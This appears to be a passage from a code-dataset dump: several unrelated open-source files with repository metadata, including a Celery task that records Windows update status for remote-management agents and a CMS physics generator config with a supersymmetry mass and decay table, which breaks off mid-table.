self, target_block, parameters_and_grads, param_group_idx
):
"""
For Multi Tensor, append optimize merged_operator to block.
"""
pass
def _is_dtype_fp16_or_bf16(self, dtype):
"""
check the dtype is fp16 or the dtype is bf16
:param dtype: instance of core.VarDesc.VarType
:return: True if dtype is one of fp16 or bf16, False otherwise
"""
assert isinstance(
dtype, core.VarDesc.VarType
), "The dtype should be an instance of core.VarDesc.VarType."
return (
dtype == core.VarDesc.VarType.FP16
or dtype == core.VarDesc.VarType.BF16
)
| [
"[email protected]"
] | |
5590c83b21209475b9f2d74cbf0f4aa8bc06fdf7 | 88023c9a62994e91291c67088156a2894cc26e9e | /corral/exceptions.py | 6b957a785fc63342e2236f36930ddf95e737b7a0 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | toros-astro/corral | 41e9d0224d734c4268bf5161d472b3c0375842f0 | 75474b38ff366330d33644461a902d07374a5bbc | refs/heads/master | 2023-06-10T15:56:12.264725 | 2018-09-03T17:59:41 | 2018-09-03T17:59:41 | 44,282,921 | 6 | 5 | BSD-3-Clause | 2023-03-24T12:03:17 | 2015-10-14T23:56:40 | Python | UTF-8 | Python | false | false | 1,745 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2017, Cabral, Juan; Sanchez, Bruno & Berois, Martín
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class ValidationError(Exception):
pass
class ImproperlyConfigured(ValueError):
pass
class DBError(Exception):
pass
| [
"[email protected]"
] | |
3314310b124324421bdc948e97abc2584f9cc2e0 | 30268e3918f8dc079a757e985fee374605c931b2 | /api/tacticalrmm/winupdate/tasks.py | 487b171e5b0bfbde2f2bdf9fc3fb94be0d93781c | [
"MIT"
] | permissive | doytsujin/tacticalrmm | e1be7ad7950bb95c4b37dd63ac03eb323115d866 | 7fb79e0bcce62dbb892fb36665ff6d7135d7bebf | refs/heads/master | 2021-03-21T14:02:24.858487 | 2020-02-24T07:11:15 | 2020-02-24T07:11:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,999 | py | from time import sleep
from agents.models import Agent
from .models import WinUpdate
from tacticalrmm.celery import app
@app.task
def check_for_updates_task(pk, wait=False):
if wait:
sleep(60)
agent = Agent.objects.get(pk=pk)
resp = agent.salt_api_cmd(
hostname=agent.salt_id,
timeout=310,
salt_timeout=300,
func="win_wua.list",
arg="skip_installed=False",
)
data = resp.json()
ret = data["return"][0][agent.salt_id]
# if managed by wsus, nothing we can do until salt supports it
if type(ret) is str:
err = ["unknown failure", "2147352567", "2145107934"]
if any(x in ret.lower() for x in err):
agent.managed_by_wsus = True
agent.save(update_fields=["managed_by_wsus"])
return f"{agent.hostname} managed by wsus"
else:
# if previously managed by wsus but no longer (i.e moved into a different OU in AD)
# then we can use salt to manage updates
if agent.managed_by_wsus and type(ret) is dict:
agent.managed_by_wsus = False
agent.save(update_fields=["managed_by_wsus"])
guids = []
for k in ret.keys():
guids.append(k)
if not WinUpdate.objects.filter(agent=agent).exists():
for i in guids:
WinUpdate(
agent=agent,
guid=i,
kb=ret[i]["KBs"][0],
mandatory=ret[i]["Mandatory"],
title=ret[i]["Title"],
needs_reboot=ret[i]["NeedsReboot"],
installed=ret[i]["Installed"],
downloaded=ret[i]["Downloaded"],
description=ret[i]["Description"],
severity=ret[i]["Severity"],
).save()
else:
for i in guids:
# check if existing update install / download status has changed
if WinUpdate.objects.filter(agent=agent).filter(guid=i).exists():
update = WinUpdate.objects.filter(agent=agent).get(guid=i)
if ret[i]["Installed"] != update.installed:
update.installed = not update.installed
update.save(update_fields=["installed"])
if ret[i]["Downloaded"] != update.downloaded:
update.downloaded = not update.downloaded
update.save(update_fields=["downloaded"])
# otherwise it's a new update
else:
WinUpdate(
agent=agent,
guid=i,
kb=ret[i]["KBs"][0],
mandatory=ret[i]["Mandatory"],
title=ret[i]["Title"],
needs_reboot=ret[i]["NeedsReboot"],
installed=ret[i]["Installed"],
downloaded=ret[i]["Downloaded"],
description=ret[i]["Description"],
severity=ret[i]["Severity"],
).save()
return "ok"
| [
"[email protected]"
] | |
494aff1c24d6117476f11ab965437fac14f43806 | 20c80f722c451b64d05cc027b66a81e1976c3253 | /commons/libs/pyblish/version.py | c978ffa548ff2ad57bbaba63dc1da19b5ff66f43 | [] | no_license | flypotatojun/Barbarian | 2d3fcb6fcb1b4495b6d62fc5e32634abf4638312 | efe14dd24c65b4852997dad1290e503211bcc419 | refs/heads/master | 2021-07-18T01:43:14.443911 | 2017-10-24T03:37:43 | 2017-10-24T03:37:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py |
VERSION_MAJOR = 1
VERSION_MINOR = 4
VERSION_PATCH = 3
version_info = (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
version = '%i.%i.%i' % version_info
__version__ = version
__all__ = ['version', 'version_info', '__version__']
| [
"[email protected]"
] | |
7003acb4f3816d60e19ac4b06f49d305dda66cfb | 2cb120360192dfdf9afa233c8585232cb3df6e8c | /samples/tf_study/prettytensor/funcs/register.py | 4d06d359b79901fe2eaade7d27002d9a528b7ee5 | [] | no_license | CosmosShadow/MLPythonLib | 6323583bca8c6ff5757465fb1a0d5c4f23deb56c | 3a2da2601330a032b737ff0addf71f679eeee94b | refs/heads/master | 2020-05-21T15:08:58.082575 | 2017-04-30T17:03:15 | 2017-04-30T17:03:15 | 44,087,820 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | # coding: utf-8
import tensorflow as tf
import prettytensor as pt
import numpy as np
import cmtf.data.data_mnist as data_mnist
@pt.Register
def leaky_relu(input_pt):
return tf.select(tf.greater(input_pt, 0.0), input_pt, 0.01*input_pt)
x = tf.Variable([1, 2, 3, -3, -2, -1], dtype=tf.float32)
x_pretty = pt.wrap(x)
y = x_pretty.leaky_relu()
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
print(sess.run(y)) | [
"[email protected]"
] | |
9a9896bbf00e4f6f26308c7699d8939dd2d12b92 | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/ThirteenTeV/LongLivedChi0/LongLivedChi0ToNuLL_MSquark_1000_MChi_700_CTau1mm_to_1000mm_TuneCUETP8M1_13TeV_pythia8_cff.py | 989f40b6f2ad7b491251cf3a1f09bb503852f142 | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 41,743 | py | COM_ENERGY = 13000 # GeV
SQUARK_MASS = 1000 # GeV
CHIZERO_MASS = 700 # GeV
GLUINO_MASS = 5000 # GeV
CROSS_SECTION = 0.02296 # pb
CHIZERO1_CTAU = 1 # mm
CHIZERO2_CTAU = 10 # mm
CHIZERO3_CTAU = 100 # mm
CHIZERO4_CTAU = 100 # mm
SLHA_TABLE = """
#
# ======================
# | THE SUSYHIT OUTPUT |
# ======================
#
#
# ------------------------------------------------------
# | This is the output of the SUSY-HIT package |
# | created by A.Djouadi, M.Muehlleitner and M.Spira. |
# | In case of problems with SUSY-HIT email to |
# | [email protected] |
# | [email protected] |
# | [email protected] |
# ------------------------------------------------------
#
# ------------------------------------------------------
# | SUSY Les Houches Accord - MSSM Spectrum + Decays |
# | based on the decay programs |
# | |
# | SDECAY 1.5 |
# | |
# | Authors: M.Muhlleitner, A.Djouadi and Y.Mambrini |
# | Ref.: Comput.Phys.Commun.168(2005)46 |
# | [hep-ph/0311167] |
# | |
# | HDECAY 3.4 |
# | |
# | By: A.Djouadi,J.Kalinowski,M.Muhlleitner,M.Spira |
# | Ref.: Comput.Phys.Commun.108(1998)56 |
# | [hep-ph/9704448] |
# | |
# | |
# | If not stated otherwise all DRbar couplings and |
# | soft SUSY breaking masses are given at the scale |
# | Q= 0.46577748E+03
# | |
# ------------------------------------------------------
#
# This file contains spectra and decay modes calculated by SUSYHIT in ~tomalin/susy_susyhit/
# with all SUSY masses set high, except for the u,d,s,c squark and all four neutralino masses,
# and the gluino mass, which are set low by hand. Furthermore, the decay modes and width of the "neutralino1",
# "neutralino2", "neutralino3" and "neutralino4" are set by hand to allow R-parity violating
# decays to the chosen final states with the chosen lifetimes. The u,d,s,c squarks given by hand a 100% BR
# to quark + neutralino.
#
BLOCK DCINFO # Decay Program information
1 SDECAY/HDECAY # decay calculator
2 1.5 /3.4 # version number
#
BLOCK SPINFO # Spectrum calculator information
1 SuSpect # RGE +Spectrum calculator
2 2.41 # version number
#
BLOCK MODSEL # Model selection
1 1 # #SUGRA
#
BLOCK SMINPUTS # Standard Model inputs
1 1.27934000E+02 # alpha_em^-1(M_Z)^MSbar
2 1.16639000E-05 # G_F [GeV^-2]
3 1.17200000E-01 # alpha_S(M_Z)^MSbar
4 9.11870000E+01 # M_Z pole mass
5 4.25000000E+00 # mb(mb)^MSbar
6 1.72500000E+02 # mt pole mass
7 1.77710000E+00 # mtau pole mass
#
BLOCK MINPAR # Input parameters - minimal models
1 1.00000000E+02 # m0
2 2.50000000E+02 # m_1
3 1.00000000E+01 # tanbeta(mZ)
4 1.00000000E+00 # sign(mu)
5 -1.00000000E+02 # A0
#
BLOCK EXTPAR # Input parameters - non-minimal models
0 4.65777483E+02 # EWSB
#
BLOCK MASS # Mass Spectrum
# PDG code mass particle
24 8.04847331E+01 # W+
25 1.09932416E+02 # h
35 3.94935594E+02 # H
36 3.94525488E+02 # A
37 4.02953218E+02 # H+
5 4.87877839E+00 # b-quark pole mass calculated from mb(mb)_Msbar
1000001 1.00000000e+03 # ~d_L
2000001 1.00000000e+03 # ~d_R
1000002 1.00000000e+03 # ~u_L
2000002 1.00000000e+03 # ~u_R
1000003 1.00000000e+03 # ~s_L
2000003 1.00000000e+03 # ~s_R
1000004 1.00000000e+03 # ~c_L
2000004 1.00000000e+03 # ~c_R
1000005 1.16777573E+05 # ~b_1
2000005 1.46086561E+05 # ~b_2
1000006 1.99615017E+05 # ~t_1
2000006 1.86391641E+05 # ~t_2
1000011 2.00774228E+05 # ~e_L
2000011 1.42820157E+05 # ~e_R
1000012 1.84853985E+05 # ~nu_eL
1000013 2.00774228E+05 # ~mu_L
2000013 1.42820157E+05 # ~mu_R
1000014 1.84853985E+05 # ~nu_muL
1000015 1.33342244E+05 # ~tau_1
2000015 2.04795115E+05 # ~tau_2
1000016 1.83966053E+05 # ~nu_tauL
1000021 5.00000000e+03 # ~g
1000022 7.00000000e+02 # ~chi_10
1000023 7.00000000e+02 # ~chi_20
1000025 7.00000000e+02 # ~chi_30
1000035 7.00000000e+02 # ~chi_40
1000024 1.79671182E+05 # ~chi_1+
1000037 3.77983105E+05 # ~chi_2+
#
BLOCK NMIX # Neutralino Mixing Matrix
1 1 9.85345167E-01 # N_11
1 2 -5.64225409E-02 # N_12
1 3 1.51059160E-01 # N_13
1 4 -5.56105151E-02 # N_14
2 1 1.06123308E-01 # N_21
2 2 9.39651214E-01 # N_22
2 3 -2.80885422E-01 # N_23
2 4 1.64002501E-01 # N_24
3 1 6.12835220E-02 # N_31
3 2 -9.07288796E-02 # N_32
3 3 -6.95178480E-01 # N_33
3 4 -7.10450196E-01 # N_34
4 1 1.18646854E-01 # N_41
4 2 -3.25023636E-01 # N_42
4 3 -6.44213777E-01 # N_43
4 4 6.82107887E-01 # N_44
#
BLOCK UMIX # Chargino Mixing Matrix U
1 1 -9.11420712E-01 # U_11
1 2 4.11475741E-01 # U_12
2 1 4.11475741E-01 # U_21
2 2 9.11420712E-01 # U_22
#
BLOCK VMIX # Chargino Mixing Matrix V
1 1 -9.70421546E-01 # V_11
1 2 2.41416701E-01 # V_12
2 1 2.41416701E-01 # V_21
2 2 9.70421546E-01 # V_22
#
BLOCK STOPMIX # Stop Mixing Matrix
1 1 5.52988023E-01 # cos(theta_t)
1 2 8.33189202E-01 # sin(theta_t)
2 1 -8.33189202E-01 # -sin(theta_t)
2 2 5.52988023E-01 # cos(theta_t)
#
BLOCK SBOTMIX # Sbottom Mixing Matrix
1 1 9.30091013E-01 # cos(theta_b)
1 2 3.67329154E-01 # sin(theta_b)
2 1 -3.67329154E-01 # -sin(theta_b)
2 2 9.30091013E-01 # cos(theta_b)
#
BLOCK STAUMIX # Stau Mixing Matrix
1 1 2.84460080E-01 # cos(theta_tau)
1 2 9.58687886E-01 # sin(theta_tau)
2 1 -9.58687886E-01 # -sin(theta_tau)
2 2 2.84460080E-01 # cos(theta_tau)
#
BLOCK ALPHA # Higgs mixing
-1.14188002E-01 # Mixing angle in the neutral Higgs boson sector
#
BLOCK HMIX Q= 4.65777483E+02 # DRbar Higgs Parameters
1 3.52164861E+02 # mu(Q)
2 9.75041102E+00 # tanbeta(Q)
3 2.45014641E+02 # vev(Q)
4 1.62371513E+05 # MA^2(Q)
#
BLOCK GAUGE Q= 4.65777483E+02 # The gauge couplings
1 3.60982135E-01 # gprime(Q) DRbar
2 6.46351672E-01 # g(Q) DRbar
3 1.09632112E+00 # g3(Q) DRbar
#
BLOCK AU Q= 4.65777483E+02 # The trilinear couplings
1 1 -6.83184382E+02 # A_u(Q) DRbar
2 2 -6.83184382E+02 # A_c(Q) DRbar
3 3 -5.06144038E+02 # A_t(Q) DRbar
#
BLOCK AD Q= 4.65777483E+02 # The trilinear couplings
1 1 -8.58985213E+02 # A_d(Q) DRbar
2 2 -8.58985213E+02 # A_s(Q) DRbar
3 3 -7.96595983E+02 # A_b(Q) DRbar
#
BLOCK AE Q= 4.65777483E+02 # The trilinear couplings
1 1 -2.53298464E+02 # A_e(Q) DRbar
2 2 -2.53298464E+02 # A_mu(Q) DRbar
3 3 -2.51542764E+02 # A_tau(Q) DRbar
#
BLOCK Yu Q= 4.65777483E+02 # The Yukawa couplings
1 1 0.00000000E+00 # y_u(Q) DRbar
2 2 0.00000000E+00 # y_c(Q) DRbar
3 3 8.78978125E-01 # y_t(Q) DRbar
#
BLOCK Yd Q= 4.65777483E+02 # The Yukawa couplings
1 1 0.00000000E+00 # y_d(Q) DRbar
2 2 0.00000000E+00 # y_s(Q) DRbar
3 3 1.39517330E-01 # y_b(Q) DRbar
#
BLOCK Ye Q= 4.65777483E+02 # The Yukawa couplings
1 1 0.00000000E+00 # y_e(Q) DRbar
2 2 0.00000000E+00 # y_mu(Q) DRbar
3 3 1.01147257E-01 # y_tau(Q) DRbar
#
BLOCK MSOFT Q= 4.65777483E+02 # The soft SUSY breaking masses at the scale Q
1 1.01486794E+02 # M_1
2 1.91565439E+02 # M_2
3 5.86284400E+02 # M_3
21 3.23226904E+04 # M^2_Hd
22 -1.24993993E+05 # M^2_Hu
31 1.95443359E+02 # M_eL
32 1.95443359E+02 # M_muL
33 1.94603750E+02 # M_tauL
34 1.35950985E+02 # M_eR
35 1.35950985E+02 # M_muR
36 1.33480599E+02 # M_tauR
41 5.45553618E+02 # M_q1L
42 5.45553618E+02 # M_q2L
43 4.97578078E+02 # M_q3L
44 5.27538927E+02 # M_uR
45 5.27538927E+02 # M_cR
46 4.23429537E+02 # M_tR
47 5.25444117E+02 # M_dR
48 5.25444117E+02 # M_sR
49 5.22139557E+02 # M_bR
#
#
#
# =================
# |The decay table|
# =================
#
# - The QCD corrections to the decays gluino -> squark + quark
# squark -> gaugino + quark_prime
# squark -> squark_prime + Higgs
# squark -> gluino + quark
# are included.
#
# - The multi-body decays for the inos, stops and sbottoms are included.
#
# - The loop induced decays for the gluino, neutralinos and stops
# are included.
#
# - The SUSY decays of the top quark are included.
#
#
# PDG Width
DECAY 6 1.44633943E+00 # top decays
# BR NDA ID1 ID2
1.00000000E+00 2 5 24 # BR(t -> b W+)
#
# PDG Width
DECAY 1000021 7.60054186E+02 # gluino decays
# BR NDA ID1 ID2
6.25000000E-02 2 1000001 -1 # BR(~g -> ~d_L db)
6.25000000E-02 2 -1000001 1 # BR(~g -> ~d_L* d )
6.25000000E-02 2 2000001 -1 # BR(~g -> ~d_R db)
6.25000000E-02 2 -2000001 1 # BR(~g -> ~d_R* d )
6.25000000E-02 2 1000002 -2 # BR(~g -> ~u_L ub)
6.25000000E-02 2 -1000002 2 # BR(~g -> ~u_L* u )
6.25000000E-02 2 2000002 -2 # BR(~g -> ~u_R ub)
6.25000000E-02 2 -2000002 2 # BR(~g -> ~u_R* u )
6.25000000E-02 2 1000003 -3 # BR(~g -> ~s_L sb)
6.25000000E-02 2 -1000003 3 # BR(~g -> ~s_L* s )
6.25000000E-02 2 2000003 -3 # BR(~g -> ~s_R sb)
6.25000000E-02 2 -2000003 3 # BR(~g -> ~s_R* s )
6.25000000E-02 2 1000004 -4 # BR(~g -> ~c_L cb)
6.25000000E-02 2 -1000004 4 # BR(~g -> ~c_L* c )
6.25000000E-02 2 2000004 -4 # BR(~g -> ~c_R cb)
6.25000000E-02 2 -2000004 4 # BR(~g -> ~c_R* c )
#
# PDG Width
DECAY 1000006 5.20726800E+08 # stop1 decays
# BR NDA ID1 ID2
6.94407916E-07 2 1000022 6 # BR(~t_1 -> ~chi_10 t )
7.54006758E-07 2 1000023 6 # BR(~t_1 -> ~chi_20 t )
1.74512689E-06 2 1000025 6 # BR(~t_1 -> ~chi_30 t )
9.52699953E-07 2 1000035 6 # BR(~t_1 -> ~chi_40 t )
1.56675416E-07 2 1000024 5 # BR(~t_1 -> ~chi_1+ b )
1.30596297E-05 2 1000021 6 # BR(~t_1 -> ~g t )
1.23218005E-11 2 1000005 37 # BR(~t_1 -> ~b_1 H+)
-1.39984102E-12 2 2000005 37 # BR(~t_1 -> ~b_2 H+)
9.48532652E-01 2 1000005 24 # BR(~t_1 -> ~b_1 W+)
5.14499859E-02 2 2000005 24 # BR(~t_1 -> ~b_2 W+)
#
# PDG Width
DECAY 2000006 7.43034077E+08 # stop2 decays
# BR NDA ID1 ID2
1.17380400E-07 2 1000022 6 # BR(~t_2 -> ~chi_10 t )
5.49682993E-07 2 1000023 6 # BR(~t_2 -> ~chi_20 t )
9.14655161E-07 2 1000025 6 # BR(~t_2 -> ~chi_30 t )
1.36777476E-06 2 1000035 6 # BR(~t_2 -> ~chi_40 t )
1.06348847E-08 2 1000024 5 # BR(~t_2 -> ~chi_1+ b )
8.72407685E-06 2 1000021 6 # BR(~t_2 -> ~g t )
1.27939288E-12 2 1000005 37 # BR(~t_2 -> ~b_1 H+)
-1.03472409E-12 2 2000005 37 # BR(~t_2 -> ~b_2 H+)
9.62083919E-01 2 1000005 24 # BR(~t_2 -> ~b_1 W+)
3.79043964E-02 2 2000005 24 # BR(~t_2 -> ~b_2 W+)
#
# PDG Width
DECAY 1000005 1.45287195E+04 # sbottom1 decays
# BR NDA ID1 ID2
5.66130593E-03 2 1000022 5 # BR(~b_1 -> ~chi_10 b )
6.03025772E-02 2 1000023 5 # BR(~b_1 -> ~chi_20 b )
1.44120022E-03 2 1000025 5 # BR(~b_1 -> ~chi_30 b )
6.36747404E-03 2 1000035 5 # BR(~b_1 -> ~chi_40 b )
9.26227443E-01 2 1000021 5 # BR(~b_1 -> ~g b )
#
# PDG Width
DECAY 2000005 7.36323181E+06 # sbottom2 decays
# BR NDA ID1 ID2
1.43513479E-05 2 1000022 5 # BR(~b_2 -> ~chi_10 b )
1.14591077E-05 2 1000023 5 # BR(~b_2 -> ~chi_20 b )
9.50353235E-06 2 1000025 5 # BR(~b_2 -> ~chi_30 b )
1.65018741E-05 2 1000035 5 # BR(~b_2 -> ~chi_40 b )
1.56864744E-03 2 1000021 5 # BR(~b_2 -> ~g b )
-2.65633090E-12 2 1000005 25 # BR(~b_2 -> ~b_1 h )
-8.87029310E-11 2 1000005 35 # BR(~b_2 -> ~b_1 H )
-1.62921553E-10 2 1000005 36 # BR(~b_2 -> ~b_1 A )
9.98379537E-01 2 1000005 23 # BR(~b_2 -> ~b_1 Z )
#
# PDG Width
DECAY 1000002 4.39789139E+00 # sup_L decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 2 # BR(~u_L -> ~chi_10 u)
2.50000000E-01 2 1000023 2 # BR(~u_L -> ~chi_20 u)
2.50000000E-01 2 1000025 2 # BR(~u_L -> ~chi_30 u)
2.50000000E-01 2 1000035 2 # BR(~u_L -> ~chi_40 u)
#
# PDG Width
DECAY 2000002 2.35699810E+00 # sup_R decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 2 # BR(~u_R -> ~chi_10 u)
2.50000000E-01 2 1000023 2 # BR(~u_R -> ~chi_20 u)
2.50000000E-01 2 1000025 2 # BR(~u_R -> ~chi_30 u)
2.50000000E-01 2 1000035 2 # BR(~u_R -> ~chi_40 u)
#
# PDG Width
DECAY 1000001 4.39789139E+00 # sdown_L decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 1 # BR(~d_L -> ~chi_10 d)
2.50000000E-01 2 1000023 1 # BR(~d_L -> ~chi_20 d)
2.50000000E-01 2 1000025 1 # BR(~d_L -> ~chi_30 d)
2.50000000E-01 2 1000035 1 # BR(~d_L -> ~chi_40 d)
#
# PDG Width
DECAY 2000001 5.89249524E-01 # sdown_R decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 1 # BR(~d_R -> ~chi_10 d)
2.50000000E-01 2 1000023 1 # BR(~d_R -> ~chi_20 d)
2.50000000E-01 2 1000025 1 # BR(~d_R -> ~chi_30 d)
2.50000000E-01 2 1000035 1 # BR(~d_R -> ~chi_40 d)
#
# PDG Width
DECAY 1000004 4.39789139E+00 # scharm_L decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 4 # BR(~c_L -> ~chi_10 c)
2.50000000E-01 2 1000023 4 # BR(~c_L -> ~chi_20 c)
2.50000000E-01 2 1000025 4 # BR(~c_L -> ~chi_30 c)
2.50000000E-01 2 1000035 4 # BR(~c_L -> ~chi_40 c)
#
# PDG Width
DECAY 2000004 2.35699810E+00 # scharm_R decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 4 # BR(~c_R -> ~chi_10 c)
2.50000000E-01 2 1000023 4 # BR(~c_R -> ~chi_20 c)
2.50000000E-01 2 1000025 4 # BR(~c_R -> ~chi_30 c)
2.50000000E-01 2 1000035 4 # BR(~c_R -> ~chi_40 c)
#
# PDG Width
DECAY 1000003 4.39789139E+00 # sstrange_L decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 3 # BR(~s_L -> ~chi_10 s)
2.50000000E-01 2 1000023 3 # BR(~s_L -> ~chi_20 s)
2.50000000E-01 2 1000025 3 # BR(~s_L -> ~chi_30 s)
2.50000000E-01 2 1000035 3 # BR(~s_L -> ~chi_40 s)
#
# PDG Width
DECAY 2000003 5.89249524E-01 # sstrange_R decays
# BR NDA ID1 ID2
2.50000000E-01 2 1000022 3 # BR(~s_R -> ~chi_10 s)
2.50000000E-01 2 1000023 3 # BR(~s_R -> ~chi_20 s)
2.50000000E-01 2 1000025 3 # BR(~s_R -> ~chi_30 s)
2.50000000E-01 2 1000035 3 # BR(~s_R -> ~chi_40 s)
#
# PDG Width
DECAY 1000011 1.14957407E+03 # selectron_L decays
# BR NDA ID1 ID2
1.77035178E-01 2 1000022 11 # BR(~e_L -> ~chi_10 e-)
7.24219211E-01 2 1000023 11 # BR(~e_L -> ~chi_20 e-)
2.31709727E-03 2 1000025 11 # BR(~e_L -> ~chi_30 e-)
4.85963722E-02 2 1000035 11 # BR(~e_L -> ~chi_40 e-)
4.78321411E-02 2 -1000024 12 # BR(~e_L -> ~chi_1- nu_e)
#
# PDG Width
DECAY 2000011 7.40491593E+02 # selectron_R decays
# BR NDA ID1 ID2
9.70905097E-01 2 1000022 11 # BR(~e_R -> ~chi_10 e-)
1.12621565E-02 2 1000023 11 # BR(~e_R -> ~chi_20 e-)
3.75567007E-03 2 1000025 11 # BR(~e_R -> ~chi_30 e-)
1.40770760E-02 2 1000035 11 # BR(~e_R -> ~chi_40 e-)
#
# PDG Width
DECAY 1000013 1.14957407E+03 # smuon_L decays
# BR NDA ID1 ID2
1.77035178E-01 2 1000022 13 # BR(~mu_L -> ~chi_10 mu-)
7.24219211E-01 2 1000023 13 # BR(~mu_L -> ~chi_20 mu-)
2.31709727E-03 2 1000025 13 # BR(~mu_L -> ~chi_30 mu-)
4.85963722E-02 2 1000035 13 # BR(~mu_L -> ~chi_40 mu-)
4.78321411E-02 2 -1000024 14 # BR(~mu_L -> ~chi_1- nu_mu)
#
# PDG Width
DECAY 2000013 7.40491593E+02 # smuon_R decays
# BR NDA ID1 ID2
9.70905097E-01 2 1000022 13 # BR(~mu_R -> ~chi_10 mu-)
1.12621565E-02 2 1000023 13 # BR(~mu_R -> ~chi_20 mu-)
3.75567007E-03 2 1000025 13 # BR(~mu_R -> ~chi_30 mu-)
1.40770760E-02 2 1000035 13 # BR(~mu_R -> ~chi_40 mu-)
#
# PDG Width
DECAY 1000015 7.21371477E+02 # stau_1 decays
# BR NDA ID1 ID2
8.79723524E-01 2 1000022 15 # BR(~tau_1 -> ~chi_10 tau-)
9.78394101E-02 2 1000023 15 # BR(~tau_1 -> ~chi_20 tau-)
1.36341837E-02 2 1000025 15 # BR(~tau_1 -> ~chi_30 tau-)
8.80288245E-03 2 1000035 15 # BR(~tau_1 -> ~chi_40 tau-)
#
# PDG Width
DECAY 2000015 7.64810560E+07 # stau_2 decays
# BR NDA ID1 ID2
3.47470450E-06 2 1000022 15 # BR(~tau_2 -> ~chi_10 tau-)
9.92864945E-06 2 1000023 15 # BR(~tau_2 -> ~chi_20 tau-)
4.16934434E-07 2 1000025 15 # BR(~tau_2 -> ~chi_30 tau-)
1.26535934E-06 2 1000035 15 # BR(~tau_2 -> ~chi_40 tau-)
8.63848274E-07 2 -1000024 16 # BR(~tau_2 -> ~chi_1- nu_tau)
1.21539693E-16 2 1000016 -37 # BR(~tau_2 -> ~nu_tauL H-)
4.76541501E-01 2 1000016 -24 # BR(~tau_2 -> ~nu_tauL W-)
3.62362808E-13 2 1000015 25 # BR(~tau_2 -> ~tau_1 h)
1.17492293E-13 2 1000015 35 # BR(~tau_2 -> ~tau_1 H)
1.71889290E-13 2 1000015 36 # BR(~tau_2 -> ~tau_1 A)
5.23442550E-01 2 1000015 23 # BR(~tau_2 -> ~tau_1 Z)
#
# PDG Width
DECAY 1000012 1.01221547E+03 # snu_eL decays
# BR NDA ID1 ID2
2.79372600E-01 2 1000022 12 # BR(~nu_eL -> ~chi_10 nu_e)
5.88214477E-01 2 1000023 12 # BR(~nu_eL -> ~chi_20 nu_e)
1.18495551E-02 2 1000025 12 # BR(~nu_eL -> ~chi_30 nu_e)
1.16194049E-01 2 1000035 12 # BR(~nu_eL -> ~chi_40 nu_e)
4.36931919E-03 2 1000024 11 # BR(~nu_eL -> ~chi_1+ e-)
#
# PDG Width
DECAY 1000014 1.01221547E+03 # snu_muL decays
# BR NDA ID1 ID2
2.79372600E-01 2 1000022 14 # BR(~nu_muL -> ~chi_10 nu_mu)
5.88214477E-01 2 1000023 14 # BR(~nu_muL -> ~chi_20 nu_mu)
1.18495551E-02 2 1000025 14 # BR(~nu_muL -> ~chi_30 nu_mu)
1.16194049E-01 2 1000035 14 # BR(~nu_muL -> ~chi_40 nu_mu)
4.36931919E-03 2 1000024 13 # BR(~nu_muL -> ~chi_1+ mu-)
#
# PDG Width
DECAY 1000016 3.45589203E+07 # snu_tauL decays
# BR NDA ID1 ID2
8.14339470E-06 2 1000022 16 # BR(~nu_tauL -> ~chi_10 nu_tau)
1.71457854E-05 2 1000023 16 # BR(~nu_tauL -> ~chi_20 nu_tau)
3.45401102E-07 2 1000025 16 # BR(~nu_tauL -> ~chi_30 nu_tau)
3.38692486E-06 2 1000035 16 # BR(~nu_tauL -> ~chi_40 nu_tau)
8.91121489E-08 2 1000024 15 # BR(~nu_tauL -> ~chi_1+ tau-)
7.73336712E-13 2 -1000015 -37 # BR(~nu_tauL -> ~tau_1+ H-)
9.99970889E-01 2 -1000015 -24 # BR(~nu_tauL -> ~tau_1+ W-)
#
# PDG Width
DECAY 1000024 7.01833737E+09 # chargino1+ decays
# BR NDA ID1 ID2
2.90894156E-07 2 1000002 -1 # BR(~chi_1+ -> ~u_L db)
2.56597205E-07 2 -1000001 2 # BR(~chi_1+ -> ~d_L* u )
